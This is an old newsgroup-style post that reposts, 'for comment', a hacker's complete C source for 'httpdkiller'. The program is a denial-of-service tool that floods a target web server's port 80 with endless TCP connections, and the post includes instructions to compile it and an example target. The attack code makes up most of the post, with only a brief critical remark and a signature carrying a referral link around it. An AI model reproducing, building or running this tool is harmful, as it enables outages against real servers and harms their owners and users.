In my travels, I've come across some interesting (and frankly stupid)
things.
This one takes the cake!
The following article showed up in a hackers newsgroup
and I thought I'd place it here for comment (and possible solutions
to reduce its effectivenes).
so. here goes......
**************************************************
Here is the source code to httpdkiller.c . It is one of the simplest
and most effective apache web server attacks I have seen. It is
written for linux but could be ported to other platforms. If you
port it to a different os, email me the source code and I'll post
it up here on the site. Save the following file as httpdkiller.c .
Then compile it by typing: gcc httpdkiller.c -O2 -o httpdkiller
Enjoy -Jason Borden
httpdkiller.c
//Coded by J
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#define true 1
#define port 80
void cause_havoc(struct hostent *host_addr)
{
int i = 0;
int sockets[65535];
struct sockaddr_in cin;
bzero(&cin, sizeof(cin));
cin.sin_family = AF_INET;
cin.sin_addr.s_addr = ((struct in_addr *)(host_addr->h_addr))->s_addr;
cin.sin_port = htons(port);
while(true)
{
sockets[i] = socket(AF_INET, SOCK_STREAM, 0);
connect(sockets[i], (void *)&cin, sizeof(cin));
printf("Created conn: %u\n", i);
usleep(10000);
if (i < 65535)
i++;
else
i = 0;
}
}
int main(int argc, char* argv[])
{
struct hostent *host_addr;
if (argc != 2)
{
printf("Usage: httpkiller webserver-ip/name\n");
printf("e.g.: httpkiller
www.deadserver.com\n");
return 1;
}
else
host_addr = gethostbyname(argv[1]);
cause_havoc(host_addr);
return 0;
}
******************************************************
stupifying, isn't it?
Hawke
--
Make a few extra $$$.
Join
http://www.processtree.com/?sponsor=29027
I will not be pushed, filed, stamped, indexed, briefed, debriefed, or
numbered!
My life is my own - No. 6
(text/plain)